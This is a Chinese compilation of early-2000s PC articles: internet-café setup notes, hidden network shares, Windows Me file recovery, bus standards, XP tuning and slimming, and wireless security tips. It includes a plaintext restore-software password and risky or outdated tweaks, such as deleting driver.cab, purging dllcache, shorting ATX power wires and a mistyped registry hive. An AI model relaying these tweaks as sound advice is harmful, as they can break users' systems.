   [copy d:\游戏　c:\windows\desktop]
    设属性“退出时关闭”

   去掉任务烂右下角图标,整理注册表run项

   e:\txwm\up-run.REG
      REGEDIT
      [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
      "autoexec"="\\\\反恐服务器\\temp\\up.bat"
      设属性“退出时关闭”

autoexec.bat command.com及快捷方式　d:脱网游戏目录、游戏菜单目录、e:\txwm
e:\还原精灵　e:\winrar 设为隐藏,D：E： 所有文件、目录设为隐藏

5。
运行txwm-bak.bat 最后设置.bat　 去掉autoexec.bat中的rem

用VOPT整理硬盘(voptxp----http://www.goldenbow.com/)

克隆C备份到e:

6。各盘克隆后需做修改：

   inter主板先启动到安全模式

  1. 运行mk-start.bat(不再限制ctrl+alt+del)
    修改网络IP,标识(网卡不同的，要重装网卡驱动)---重启，

     测试能否上网,测试能否删除

     运行del-start.bat

   2.安装还原精灵－－－－HMRes.dll 禁用更改密码按钮

       安装目录默认
       d: e:不保护
       自动还原（有问题时改为，定时还原）
       密码:hbhsyuan

     先不重启

    运行"删除还原精灵菜单.bat"
  运行regedit
    删除[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
    \还原精灵
     21st DEMO]脱网游戏，还原精灵，狼牙借口等只留安装在C：的工具项
    删除[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
        下无用项 ：还原精灵(hddgum.exe)

  3.万象设置：WINDOWS启动就运行，屏蔽F4F8,禁运行

    反恐cdkey修改

    运行:隐藏文件夹选项.reg"
    运行:清空“文档”项
      关闭所有窗口
      -----重启

问题1：以上方案中有哪些优化不必要，还有哪些优化应该加
    2：安装各游戏前，能否安装还原精灵只保护C：，游戏安装在D：，然后导出游戏相关注册表，玩游戏时用批处理调入，以保证系统的干净？
3。安全设置有两种方案：一、除E：外，全部保护，然后定期手工更新游戏
                      二、只保护C：，其它盘通过禁下载、禁删除保护
                          （禁下载会影响有些用户的正常需求）
    请大家讨论怎样为佳？

--------------------------------------------------------------------------------
2003/06/16 04:19pm　IP: 已设置保密


共享也能隐藏

《一键清理系统垃圾》

共享也能隐藏

    现在许多单位都建立了自己的局域网，大大方便了内部联系。为了实现资源的共享，通常的做法是建立一个共享文件夹，并指定一个访问口令。但这时局域网内的每一台机器都能通过“网上邻居”看到你的共享文件夹，有时可能你不希望无关的人员看到你的共享文件夹，则下述的方法可以让你的愿望变为现实，该方法是：
    1.启动“资源管理器”，右键单击要共享的文件夹，比如“Foxmail”文件夹，再单击“属性”，系统弹出“Foxmail　属性”对话框，选择“共享”选项卡。
    2.选中“共享为”复选钮，在“共享名”框中输入一个名字，并紧跟着输入一个字符“＄”。“＄”的作用就是隐藏该共享文件夹，这样他人在“网上邻居”中就无法看到该共享的文件夹。
    3.进行其他设置后，单击“确定”按钮。
    最后，谈一谈如何访问被隐藏的共享文件夹。由于该文件夹被隐藏，所以不能通过鼠标对它进行操作，但可以在“网上邻居”找到并打开该计算机后，通过在“地址栏”中指定路径的方法来访问该文件夹。比如，我们在框中键入“Foxmail＄”。
    这样就使得只有知道该文件夹存放路径的用户才能使用该共享文件夹，从而达到了隐藏的目的。


关闭程序时关闭其DLL文件

《一键清理系统垃圾》

关闭程序时关闭其DLL文件

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer]
"Max Cached Icons"=dword:00002000
"AlwaysUnloadDLL"="1"


恢复Windows Me中的丢失文件

《一键清理系统垃圾》

恢复Windows Me中的丢失文件

《中国电脑教育报》丁和云

    也许你也遇到过这样的情况，用卸载程序卸载软件或遭到病毒破坏或误删除而导致文件丢失，从而使操作系统和其他应用程序中止运行，笔者用的是Windows Me操作系统，如果你也有和我一样的烦恼，让我们一起来看看如何恢复Windows Me中的丢失文件，而免受重装系统之苦吧。

    1、共享程序文件丢失

    大多数应用程序文件安装前都是压缩文件，必须由安装程序或Extract命令解压。但也有一些共享程序文件安装前并未压缩，如Office 2000使用的许多动态链接库文件。如果在运行程序时系统提示此类文件丢失，可按如下方法处理：

    （1）记下文件以及它所在的文件夹名称，单击“开始”菜单打开其搜索功能，在“要搜索的文件或文件夹名为”栏内，输入完整的文件名；在“搜索范围”栏，选择本机硬盘驱动器，单击“立即搜索”按钮。

    （2）选中右下窗口中的文件，单击鼠标右键选择“复制”。再打开丢失文件所在的文件夹，将找到的文件“粘贴”到其中即可。

    以上步骤用于恢复DLL之类的共享程序文件较好，但由于未压缩的共享程序文件较少，所以其局限性较大。

    2、Windows Me系统文件丢失

    系统文件丢失的现象是：启动过程系统提示某些系统文件被破坏或被替换为旧版本，导致系统的部分功能无法使用。此时只要Windows Me和“附件”中的“系统工具”程序可以运行，就能用下面的步骤恢复。

    （1）记下丢失的系统文件名称和路径，运行Windows Me“附件→系统工具”中的“系统信息”程序。

    （2）单击“工具”菜单中的“系统文件检查器”命令。

    （3）选中“系统文件检查器”中的“从安装软盘提取一个文件”项，然后在下面的文本框内输入要替换的文件名，如update、sys。

    （4）单击“开始”按钮，打开“提取文件”对话框。如果使用原始安装盘进行恢复且事先用“系统文件检查器”扫描过系统，它会自动在“还原自”和“将文件保存到”框内给出文件的源路径和恢复路径，如“D:\win”或“C:\Windows\system32\drivers ”。否则需要单击“浏览”按钮手工给出相关路径，然后单击“确定”按钮，即可自动完成丢失文件的提取和恢复。

    以上步骤可以自动恢复Windows Me系统文件，也能手工恢复其他微软应用程序（使用CAB压缩格式）中的文件。前提是系统破坏不太严重，事先用“系统文件检查器”扫描过系统最好。在“系统文件检查器”能够运行时最好使用此法。

    3、Windows Me重要文件丢失

    若Windows VxD（虚拟设备驱动程序）之类的重要文件丢失，后果一般比较严重，会出现“蓝屏警告”，提示某某文件丢失等。此时最好使用Windows Me启动盘提供的Ext命令进行恢复。

    （1）记下丢失的文件名称和路径，用事先准备的Windows Me启动盘，选择多重配置启动菜单中的第一项（加载通用CD-ROM驱动程序并创建一个大小为2MB的RAM驱动器）启动电脑。启动后进入RAM驱动器，输入Ext命令后回车。

    （2）在提示“Please enter the path to the Windows CAB files(a):”后输入Windows安装压缩包所在的完整路径，如“F:\pwin\win”，完成后回车。

    （3）在提示“Please enter the name(s) of the file(s) you want to extract：”后输入记下的丢失文件名，如“Bios.Vxd”，回车。

    （4）在解压路径提示“Please enter path to extract to ("Enter" for current directory) :”后输入文件将被解压的完整路径，如C:\Windows\system并键入回车。

    （5）最后出现确认提示“Is this OK?(y/n):”，输入“Y”后回车。Ext程序会自动查找安装盘中的CAB压缩包，并将文件释放到指定的位置。

    以上步骤的最大优点是能在Windows Me完全不能运行的情况下自动恢复文件，当前两种方法无效时可用此方法。

    4、无Windows Me启动盘时的应急恢复

    如果遇到了Windows Me无法启动的故障，同时手边又没有Windows Me启动盘。则只能用Windows\Command目录中的Extract命令提取丢失文件。Extract命令的格式如下：

    Extract [/y] [/a] [/d|/e] [/l dir] Cabinet [filename……]

    Extract [/y] source [newname]

    Extract [/y] [/c] source destination

    其中开关示意：“/y” 表示覆盖已存在的文件时不提示；“/a”表示从指定的第一个CAB开始处理全部CAB文件；“/D”表示显示CAB文件所包含的文件目录，可用于查找文件；“/E”表示解压缩；“/L Dir”表示指定解压缩文件的位置，缺省为当前目录；“Cabinet”表示指定Windows 安装盘中的CAB压缩包；“Filename”表示指定想从CAB文件中解压缩的文件名，可以使用通配符或以空格隔开对个文件名，缺省则用原文件名；“/C”表示拷贝CAB 文件。

    假如BIOS.Vxd丢失，可使用“Extract /D E:\win98\xxxx_xx、CAB”命令，逐个列出Windows 下的CAB压缩包目录，最后找到它在Base6.Cab中。然后使用“Extract /E /L C:\windows\system E:\Win98\Base6.Cab Bios.Vxd”命令将其从Windows目录下的Base6.Cab压缩包解压至C:\windows\system目录，完成后重新启动系统即可。

    以上步骤原则上能够用于所有CAB格式文件的恢复，由于使用命令行方式查找文件非常不便，建议用于Windows Me以外的文件恢复，对Windows Me文件最好使用启动盘提供的Ext命令进行恢复。


机箱内部线路的整理以及优化技巧

《一键清理系统垃圾》

机箱内部线路的整理以及优化技巧

    作为一个硬件爱好者，大家可能更关心CPU和显卡等部件，但是作为整机的载体－－机箱，很多朋友可能就不是太注意。其实机箱是整个机器的承载者，发挥着非常大的作用。大家可能会产生一个疑问：为什么计算机的内部也要美观呢？其实把计算机内部整理得比较有条理，对硬件的工作也有一定的益处。因此，今天就来告诉你如何整理机箱。
    大家都知道这个夏天好像非常的热，但是谁都不敢保证天气什么时候又会热起来，因此散热一直是一个热门话题。但是我们往往会忽略整个系统的空气循环。机器里最影响空气流通的就是排线。由于它的面积大而且在设计时往往会存在这样或那样的问题，不仅影响美观，更可能影响整机的散热。
    “工欲善其事，必先利其器”，其实一把刻刀，一卷弹簧胶带就OK了，当然最好不要用橡皮筋，橡皮筋易老化。常用的硬盘数据线有四十线和八十线的，现在我们就以四十线的数据线来做说明。
    首先在桌面上铺一下硬纸板，用记得刀从排线的槽中割开，一定注意不能把线割断。完成后，你可能会觉得信号线更乱了，那么怎么办呢？接着缠线。我们用弹簧胶带，首先用线的两头，集中到一起后缠紧，然后固定一下就OK，但是不要缠得太紧。最好把所有的排线放在一起，也利于空气的流通，对散热有莫大的好处，这一点希望大家能注意。
    接着介绍安装液晶温度计。现在主板中一般有温度探头，而且可以在BIOS中观察温度，但是它的精确度往往不尽人意，因此我们要给机器装一个温度计。如果大家有这样的想法的话，不妨按照如下方法操作：首先准备两个液晶温度计和手持砂轮，我们的温度计由面板和探头组成，测量的范围是－40到90度，它的体积不大。找出一块空闲的机箱档板，在档板上画出两个温度计的轮廓。把档板固定一下，用砂轮在档板上挖两个洞，如果切出的轮廓背面很粗糙的话可以用砂纸打磨一下。完成后安装温度计就OK了，有条件的话还可以用玻璃胶固定一下，一块电池可以使用一到两年。当你发现面板上的数字模糊不清时，换电池就OK了。
    再介绍一下如何不通过主板直接唤醒使用ATM电源的机器。通常情况下，我们都用ATX电源，但是ATX电源没有通过独立的电源开关，不过我们可以将插头上的14号线接地，也就是将绿线和黑线短接进行接地。在原电路基础上，加一个双向形状和一个发光二极管，其中二极管的电压一定要注意，一般在2V左右，而电路中我们连接的是黄线和地线，为了二极管的安全，我们在线路中加了一个750欧的分压电阻


计算机总线技术基础知识（二）

《一键清理系统垃圾》

计算机总线技术基础知识（二）

二、系统总线

    1．ISA总线

    ISA（industrial standard architecture）总线标准是IBM 公司1984年为推出PC/AT机而建立的系统总线标准，所以也叫AT总线。它是对XT总线的扩展，以适应8/16位数据总线要求。它在80286至80486时代应用非常广泛，以至于现在奔腾机中还保留有ISA总线插槽。ISA总线有98只引脚。

    2．EISA总线

    EISA总线是1988年由Compaq等9家公司联合推出的总线标准。它是在ISA总线的基础上使用双层插座，在原来ISA总线的98条信号线上又增加了98条信号线，也就是在两条ISA信号线之间添加一条EISA信号线。在实用中，EISA总线完全兼容ISA总线信号。

    3．VESA总线

    VESA（video electronics standard association）总线是 1992年由60家附件卡制造商联合推出的一种局部总线，简称为VL(VESA local bus)总线。它的推出为微机系统总线体系结构的革新奠定了基础。该总线系统考虑到CPU与主存和Cache 的直接相连，通常把这部分总线称为CPU总线或主总线，其他设备通过VL总线与CPU总线相连，所以VL总线被称为局部总线。它定义了32位数据线，且可通过扩展槽扩展到64 位，使用33MHz时钟频率，最大传输率达132MB/s，可与CPU同步工作。是一种高速、高效的局部总线，可支持386SX、386DX、486SX、486DX及奔腾微处理器。

    4．PCI总线

    PCI（peripheral component interconnect）总线是当前最流行的总线之一，它是由Intel公司推出的一种局部总线。它定义了32位数据总线，且可扩展为64位。PCI总线主板插槽的体积比原ISA总线插槽还小，其功能比VESA、ISA有极大的改善，支持突发读写操作，最大传输速率可达132MB/s，可同时支持多组外围设备。 PCI局部总线不能兼容现有的ISA、EISA、MCA（micro channel architecture）总线，但它不受制于处理器，是基于奔腾等新一代微处理器而发展的总线。

    5．Compact PCI

    以上所列举的几种系统总线一般都用于商用PC机中，在计算机系统总线中，还有另一大类为适应工业现场环境而设计的系统总线，比如STD总线、 VME总线、PC/104总线等。这里仅介绍当前工业计算机的热门总线之一——Compact PCI。

    Compact PCI的意思是“坚实的PCI”，是当今第一个采用无源总线底板结构的PCI系统，是PCI总线的电气和软件标准加欧式卡的工业组装标准，是当今最新的一种工业计算机标准。Compact PCI是在原来PCI总线基础上改造而来，它利用PCI的优点，提供满足工业环境应用要求的高性能核心系统，同时还考虑充分利用传统的总线产品，如ISA、STD、VME或PC/104来扩充系统的I/O和其他功能。


计算机总线技术基础知识（三）

《一键清理系统垃圾》

计算机总线技术基础知识（三）

三、外部总线

    1．RS-232-C总线

    RS-232-C是美国电子工业协会EIA（Electronic Industry Association）制定的一种串行物理接口标准。RS是英文“推荐标准”的缩写，232为标识号，C表示修改次数。RS-232-C总线标准设有25条信号线，包括一个主通道和一个辅助通道，在多数情况下主要使用主通道，对于一般双工通信，仅需几条信号线就可实现，如一条发送线、一条接收线及一条地线。RS-232-C标准规定的数据传输速率为每秒50、75、 100、150、300、600、1200、2400、4800、9600、19200波特。RS-232-C标准规定，驱动器允许有2500pF的电容负载，通信距离将受此电容限制，例如，采用150pF/m的通信电缆时，最大通信距离为15m；若每米电缆的电容量减小，通信距离可以增加。传输距离短的另一原因是RS-232属单端信号传送，存在共地噪声和不能抑制共模干扰等问题，因此一般用于20m以内的通信。

    2．RS-485总线

    在要求通信距离为几十米到上千米时，广泛采用RS-485 串行总线标准。RS-485采用平衡发送和差分接收，因此具有抑制共模干扰的能力。加上总线收发器具有高灵敏度，能检测低至200mV的电压，故传输信号能在千米以外得到恢复。 RS-485采用半双工工作方式，任何时候只能有一点处于发送状态，因此，发送电路须由使能信号加以控制。RS-485用于多点互连时非常方便，可以省掉许多信号线。应用RS-485 可以联网构成分布式系统，其允许最多并联32台驱动器和32台接收器。

    3．IEEE-488总线

    上述两种外部总线是串行总线，而IEEE-488 总线是并行总线接口标准。IEEE-488总线用来连接系统，如微计算机、数字电压表、数码显示器等设备及其他仪器仪表均可用IEEE-488总线装配起来。它按照位并行、字节串行双向异步方式传输信号，连接方式为总线方式，仪器设备直接并联于总线上而不需中介单元，但总线上最多可连接15台设备。最大传输距离为20米，信号传输速度一般为500KB/s，最大传输速度为1MB/s。

    4．USB总线

---通用串行总线USB（universal serial bus）是由Intel、 Compaq、Digital、IBM、Microsoft、NEC、Northern Telecom等7家世界著名的计算机和通信公司共同推出的一种新型接口标准。它基于通用连接技术，实现外设的简单快速连接，达到方便用户、降低成本、扩展PC连接外设范围的目的。它可以为外设提供电源，而不像普通的使用串、并口的设备需要单独的供电系统。另外，快速是USB技术的突出特点之一，USB的最高传输率可达12Mbps比串口快100倍，比并口快近10倍，而且USB还能支持多媒体。


计算机总线技术基础知识（一）

《一键清理系统垃圾》

计算机总线技术基础知识（一）

     计算机总线技术基础知识（一）

     任何一个微处理器都要与一定数量的部件和外围设备连接，但如果将各部件和每一种外围设备都分别用一组线路与CPU直接连接，那么连线将会错综复杂，甚至难以实现。为了简化硬件电路设计、简化系统结构，常用一组线路，配置以适当的接口电路，与各部件和外围设备连接，这组共用的连接线路被称为总线。采用总线结构便于部件和设备的扩充，尤其制定了统一的总线标准则容易使不同设备间实现互连。

    微机中总线一般有内部总线、系统总线和外部总线。内部总线是微机内部各外围芯片与处理器之间的总线，用于芯片一级的互连；而系统总线是微机中各插件板与系统板之间的总线，用于插件板一级的互连；外部总线则是微机和外部设备之间的总线，微机作为一种设备，通过该总线和其他设备进行信息与数据交换，它用于设备一级的互连。

    另外，从广义上说，计算机通信方式可以分为并行通信和串行通信，相应的通信总线被称为并行总线和串行总线。并行通信速度快、实时性好，但由于占用的口线多，不适于小型化产品；而串行通信速率虽低，但在数据通信吞吐量不是很大的微处理电路中则显得更加简易、方便、灵活。串行通信一般可分为异步模式和同步模式。

    随着微电子技术和计算机技术的发展，总线技术也在不断地发展和完善，而使计算机总线技术种类繁多，各具特色。下面仅对微机各类总线中目前比较流行的总线技术分别加以介绍。

一、内部总线

    1．I2C总线

    I2C（Inter-IC）总线10多年前由Philips公司推出，是近年来在微电子通信控制领域广泛采用的一种新型总线标准。它是同步通信的一种特殊形式，具有接口线少，控制方式简化，器件封装形式小，通信速率较高等优点。在主从通信中，可以有多个I2C总线器件同时接到I2C总线上，通过地址来识别通信对象。

    2．SPI总线

    串行外围设备接口SPI（serial peripheral interface）总线技术是Motorola公司推出的一种同步串行接口。Motorola公司生产的绝大多数MCU（微控制器）都配有SPI硬件接口，如68系列MCU。SPI总线是一种三线同步总线，因其硬件功能很强，所以，与SPI有关的软件就相当简单，使CPU有更多的时间处理其他事务。

    3．SCI总线

    串行通信接口SCI（serial communication interface）也是由Motorola公司推出的。它是一种通用异步通信接口UART，与MCS-51的异步通信功能基本相同。


Windows XP减肥加速系列--------加速篇

《一键清理系统垃圾》

Windows XP减肥加速系列--------加速篇

上次介绍了一些减肥的方法，现在介绍一些常用的、有效的加速方法。

由于计算机软硬件配置不同，这里按照内存大小来区分加速方案，请大家根据自己的内存大小确定加速方案。选择前请大家先参照一般优化方案来优化你的系统。然后再按照特殊优化方案优化你的系统。

一般优化方案
        一般优化方案可以适用于所有的系统配置， 推荐大家在使用下面的优化方案的时候先使用一般优化方案进行优化。优化方案介绍：
注册表类：
1.启用CPU L2 Cahce：HKCU_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management,新建Dword值：SecondLevelDataCache，修改这个值(填写的时候使用10进制，)为你的CPU的2级缓存的大小。

  2级缓存大小介绍

AMD系列　Duron 64KB　K6-3 Thunderbird AthlonXP 256KB　K6-2 Athlon 512KB
Intel系列　CeleronA Celeron2 128KB　P2 Mobile P3E(EB) P4 Willamette 256KB　P2 P3(katmai) P4(Northwood) 512KB

    举例说明：比如通过上表查的你的CPU的2级缓存是256KB，那么就修改Dword值SecondLevelDataCache为10进制的256即可。

2.让IE使用多线程下载网页：注册表子键：HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Internet Settings，新建双字节值项“MaxConnectionsPerServer”，此项的作用是决定最大同步下载的连线数目，一般5～8个连线数目比较好。另外，对于HTTP 1.0服务器，可以加入名为“MaxConnectionsPer1_0Server”的双字节值项，其值也是设置最大同步下载的数目。

驱动类：
1.如果是Intel 8XX芯片组的话，一定要安装Intel Application Accelerator,安装以后系统优化很明显.这个东西可以到Intel官方网站下载。
2.如果是非Intel芯片组的主板，安装相应的补丁程序是必不可少的。如VIA的4in1程序等等。
3.尽量使用通过了WHL认证的驱动程序。这种驱动程序通过了微软硬件实验室的认证，在稳定性/兼容性有很大的优势。

其他类：
1.启动加速：虽然WindowsXP的启动速度有了很大的提高，但是还是有加速的余力的。到微软站点下载Bootvis.exe文件，启动它，依次选择菜单里面的Trace--Optimize System，这时候系统会提示是否重新启动，选择启动，重启登录以后什么都别动，过一段时间会自动弹出一个对话框，对话框上写着系统分析的意思，你什么都别做，要一直等到提示分析完毕以后才能够操作你的系统，分析时间有点长，请耐心等待。
2.使用固定的虚拟缓存：建议把最大值和最小值都设置为382M，而不管你的物理内存的大小。
3.确保内存使用优先用于程序，CPU计划优先用于程序。打开系统属性，打开“高级”选项卡，在“性能”栏里面点击设置按钮，打开性能选项对话框，然后打开高级选项卡，在处理器计划一栏里面选择程序，在内存使用一栏上选择程序，然后确定退出。

特殊优化方案

大于512M　256M--512M　128M--256M
96M--128M　64M--96M　小于64M

大于512M组的加速方案
       512M的内存容量对于WindowsXP是足够的了，即使开启所有的特效，也不会感到系统的迟缓，所以没有必要进行特定的优化，只需要参照一般优化措施进行就可以了。

256M--512M组的加速方案
      如果你的内存大小介于512M和256M之间的话，那么WindowsXP在你的系统上跑的效果应该和512M内存组的效果差不多，区别只在如果同时运行几个大型应用程序，那么512M内存组的系统会更加流畅一点而已。一般情况下无需做什么优化，如果感觉到需要优化的话，请参照下一个组的优化方案来操作。

128M--256M组的加速方案
      这个组的优化方案也适用于上面2个组的。
      优化方案：由于这个组的内存不是很大，有些时候系统会不停的使用虚拟内存，为了避免不停的读取硬盘造成硬盘过早的损坏，我们不得不采取一些措施来强制性的减少系统程序对内存的占用率…………

96M--128M组的加速方案
      这个组的优化方案建立在上一个组的优化方案上，要先按照上一个组的优化方案优化以后才能够适用本组的优化方案。
      优化方案：这个组的内存已经算是比较小的了，虽然在这个容量上跑WinXP有点吃力，但是经过一番优化以后还是能够跑起来的，而不是走起来。这个优化反感还是建立在较少特效的基础上来做的…………

64M--96M组的加速方案
      要使用这个组的优化方案，就先要使用上2个组的优化方案，不然不能够使用。
      优化方案：这个组的内存是很小的了，要在这个组上比较流畅的使用WindowsXP，就必须关闭所有特效。虽然关闭特效以后系统不是很好看，但是为了你能够流畅的使用你的WinXP，就必须有一点代价，代价就是关闭所有特效…………

小于64M组的加速方案
      不要安装WindowsXP，除非您能够忍受极其缓慢的速度！！


家庭无线网络安全七点小技巧

《一键清理系统垃圾》

家庭无线网络安全七点小技巧

    现在，多数家庭通过组建无线网络来访问因特网已经成为一个趋势。然而又有多少人知道在这个趋势的背后隐藏着许许多多的网络安全问题。原则上，无线网络比有线网络更容易受到入侵，因为被攻击端的电脑与攻击端的电脑并不需要网线设备上的连接，他只要在你无线路由器或中继器的有效范围内，就可以进入你的内部网络，访问的的资源，如果你在内部网络传输的数据并未加密的话，更有可能被人家窥探你的数据隐私。此外，无线网络就其发展的历史来讲，远不如有线网络长，其安全理论和解决方案远不够完善。所有的这些都讲导致无线网络的安全性教有线网络差。在这篇文章里，让我来告诉你如何通过一些安全措施来让你的无线网络变的更安全、更可靠。

    1． 修改用户名和密码（不使用默认的用户名和密码）

    一般的家庭无线网络都是通过通过一个无线路由器或中继器来访问外部网络。通常这些路由器或中继器设备制造商为了便于用户设置这些设备建立起无线网络，都提供了一个管理页面工具。这个页面工具可以用来设置该设备的网络地址以及帐号等信息。为了保证只有设备拥有者才能使用这个管理页面工具，该设备通常也设有登陆界面，只有输入正确的用户名和密码的用户才能进入管理页面。然而在设备出售时，制造商给每一个型号的设备提供的默认用户名和密码都是一样，不幸的是，很多家庭用户购买这些设备回来之后，都不会去修改设备的默认的用户名和密码。这就使得黑客们有机可乘。他们只要通过简单的扫描工具很容易就能找出这些设备的地址并尝试用默认的用户名和密码去登陆管理页面，如果成功则立即取得该路由器/交换机的控制权。

    2． 使用加密

    所有的无线网络都提供某些形式的加密。之前我跟大家提过，攻击端电脑只要在无线路由器/中继器的有效范围内的话，那么它很大机会访问到该无线网络，一旦它能访问该内部网络时，该网络中所有是传输的数据对他来说都是透明的。如果这些数据都没经过加密的话，黑客就可以通过一些数据包嗅探工具来抓包、分析并窥探到其中的隐私。开启你的无线网络加密，这样即使你在无线网络上传输的数据被截取了也没办法（或者是说没那么容易）被解读。目前，无线网络中已经存在好几种加密技术。通常我们选用能力最强的那种加密技术。此外要注意的是，如果你的网络中同时存在多个无线网络设备的话，这些设备的加密技术应该选取同一个。

    3． 修改默认的服务区标识符（SSID）

    通常每个无线网络都有一个服务区标识符（SSID），无线客户端需要加入该网络的时候需要有一个相同的SSID，否则将被“拒之门外”。通常路由器/中继器设备制造商都在他们的产品中设了一个默认的相同的SSID。例如linksys设备的SSID通常是“linksys”。如果一个网络，不为其指定一个SSID或者只使用默认SSID的话，那么任何无线客户端都可以进入该网络。无疑这为黑客的入侵网络打开了方便之门。

    4． 禁止SSID广播

    在无线网络中，各路由设备有个很重要的功能，那就是服务区标识符广播，即SSID广播。最初，这个功能主要是为那些无线网络客户端流动量特别大的商业无线网络而设计的。开启了SSID广播的无线网络，其路由设备会自动向其有效范围内的无线网络客户端广播自己的SSID号，无线网络客户端接收到这个SSID号后，利用这个SSID号才可以使用这个网络。但是，这个功能却存在极大的安全隐患，就好象它自动地为想进入该网络的黑客打开了门户。在商业网络里，由于为了满足经常变动的无线网络接入端，必定要牺牲安全性来开启这项功能，但是作为家庭无线网络来讲，网络成员相对固定，所以没必要开启这项功能。

    5． 设置MAC地址过滤

    众所周知，基本上每一个网络接点设备都有一个独一无二的标识称之为物理地址或MAC地址，当然无线网络设备也不例外。所有路由器/中继器等路由设备都会跟踪所有经过他们的数据包源MAC地址。通常，许多这类设备都提供对MAC地址的操作，这样我们可以通过建立我们自己的准通过MAC地址列表，来防止非法设备（主机等）接入网络。但是值得一提的是，该方法并不是绝对的有效的，因为我们很容易修改自己电脑网卡的MAC地址，笔者就有一篇文章专门介绍如何修改MAC地址的。

    6． 为你的网络设备分配静态IP

    由于DHCP服务越来越容易建立，很多家庭无线网络都使用DHCP服务来为网络中的客户端动态分配IP。这导致了另外一个安全隐患，那就是接入网络的攻击端很容易就通过DHCP服务来得到一个合法的IP。然而在成员很固定的家庭网络中，我们可以通过为网络成员设备分配固定的IP地址，然后再再路由器上设定允许接入设备IP地址列表，从而可以有效地防止非法入侵，保护你的网络。

    7． 确定位置，隐藏好你的路由器或中继器

    大家都知道，无线网络路由器或中继器等设备，都是通过无线电波的形式传播数据，而且数据传播都有一个有效的范围。当你的设备覆盖范围，远远超出你家的范围之外的话，那么你就需要考虑一下你的网络安全性了，因为这样的话，黑客可能很容易再你家外登陆到你的家庭无线网络。此外，如果你的邻居也使用了无线网络，那么你还需要考虑一下你的路由器或中继器的覆盖范围是否会与邻居的相重叠，如果重叠的话就会引起冲突，影响你的网络传输，一旦发生这种情况，你就需要为你的路由器或中继器设置一个不同于邻居网络的频段（也称Channel）。根据你自己的家庭，选择好合适有效范围的路由器或中继器，并选择好其安放的位置，一般来讲，安置再家庭最中间的位置是最合适的。


Windows XP减肥加速系列--------减肥篇（1）

《一键清理系统垃圾》

Windows XP减肥加速系列--------减肥篇（1）

2002-02-20　　　 作者：

Windows XP安装完毕以后至少要占用1.5G的硬盘空间，虽然现在硬盘价格一落再落，但是还是有众多朋友使用的硬盘空间不够，即使勉强安装了Windows XP，也不能够安装其他应用软件，怎么办？加硬盘？没钱！不使用Windows XP？心里面不舒服！其实经过我们一番处理以后，Windows XP只需要1G左右的硬盘空间就足够了。

是不是感到很意外？其实要达到这个目标是需要有一定基础的。首先内存大小至少要满足128M，其次要有一张完整版本的Windows XP的安装光盘（最好是没有破解的Windows XP光盘，能够使用正版的Windows XP镜像光盘当然更好），第三是要有一点计算机使用经验，这里的经验不是指只会打游戏，而是要知道如何调整计算机软件设置。有了以上3点以后就可以开始减肥了。

首先用查找功能搜索sysoc.inf（位于windows目录里面） ，找到以后用记事本打开，然后用替换功能替换.hide为空（图1）

然后打开控制面板--〉添加/删除程序--〉添加/删除Windows组件，是不是可以看到有一些新的可添加/删除的东西出来。注意：有一些东西是不能够卸载的，如IE，不要为了节省几十M的硬盘空间而导致系统崩溃，这是划不来的。具体那些可以卸载你可以根据自己的需要来决定。如：我不需要索引服务，我就可以把它卸载。

Windows XP减肥加速系列--------减肥篇（2）

2002-02-20　　　　　作者：

刚刚只是小试牛刀,大的动作现在才开始。

Windows XP有一个驱动程序包叫做driver.cab，大概有74M，CAB包里面全部是驱动程序，如果我们今后不再需要安装驱动程序，也就是说今后没有硬件设备添加，那么这个体积如此巨大的CAB包是可以不要的。这个驱动程序包位于windows\driver cache\ i386目录里面，直接删除即可。简单不？

WinME有一个系统还原很是讨厌，WindowsXP也有这个功能，不过WindowsXP的系统还原比WinME的要好用，一是因为占用的空间比WinME的少，二是因为还原的很彻底，三是因为可以随机调整空间大小。不过，系统还原的确好用，不过有多少人会使用这个功能，而且对于硬盘空间狭小的用户来说，系统还原简直是一个吃盘怪兽，禁用的确很简单，但是如果要保留怎么办？这更简单了。

按下快捷键WinKey+Pause/Break就可以调出系统属性来，打开系统还原标签页，选中你要修改的盘符，然后点击设置就可以调整占用空间大小。Windows XP默认为占用12%的磁盘空间，如果你的这个分区很大的话，那么你算算12%有多少了？一般限制在400M就差不多了（建议只监测Windows XP系统安装盘，其他的分区可以不监测，因为如果你还原了系统安装盘，你在其他分区上安装的软件也就很难再运行了，这个时候就可以手工删除安装目录，然后重新安装软件）。如果你放弃很早的系统还原资料怎么办？很简单，打开开始--〉程序--〉附件--〉系统工具--〉瓷盘清理，然后选择Windows XP安装盘，点击确定，系统会自动扫描，扫描完以后不要忙着点确定，打开其他选项标签页，按最下面的那个清理按钮（图），然后系统会提示是不是删除早期的系统还原点，确认就继续，否则取消。这一招很有效，推荐经常使用。然后回到磁盘清理标签页，建议把IE临时文件这个复选框也选中，这样又可以使你的硬盘可用空间增多。

OK!经过这一番整理以后你的可用空间是不是有多了一些？以上操作只节省了不超过200M的空间，我们的目标是节省500M的空间，那么剩下的300M空间从哪里找出来呢？请继续往下看。

Windows XP减肥加速系列--------减肥篇（3）

2002-02-20　　　作者：

要实现终极目标，就要使用非常规做法！当然，非常规做法是很危险的，建议大家谨慎使用！！

运行cmd打开命令提示行窗口，然后输入sfc /purgecache<回车>，这样操作以后就可以清理出大概300M的空间，是不是有点恐怖？其实也没有设么？这个命令是用于清理dllcache里面的文件的，dllcache是WindowsXP的一个重要文件备份目录，里面有Windows XP的重要文件的备份，如果哪一个文件损坏了，系统就会自动的用备份的文件替换损坏的文件以达到保持系统稳定的目的。这个目录在Win2000里面也同样存在，所以这个方法也可以用于win2000。先前我曾经提出了3个要求，其中有一个就是要有1张完整的Windows XP安装光盘，这张光盘就是为这里准备的。如果哪一天系统要求插入Windows XP安装光盘，那么你就可以插入这样光盘，我还提出最好是没有破解的安装光盘，这是因为WindowsXP安装程序有数字签名，一旦被破解以后，数字签名丧失，系统就不会使用这个文件，所以说最好是一张没有破解的Windows XP的安装光盘。

上述操作以最后一种最为危险，但是也最能够达到目的，我再次提醒大小小心使用最后方法，这种方法很危险！！

另外再提供几种增加可用空间的方法：
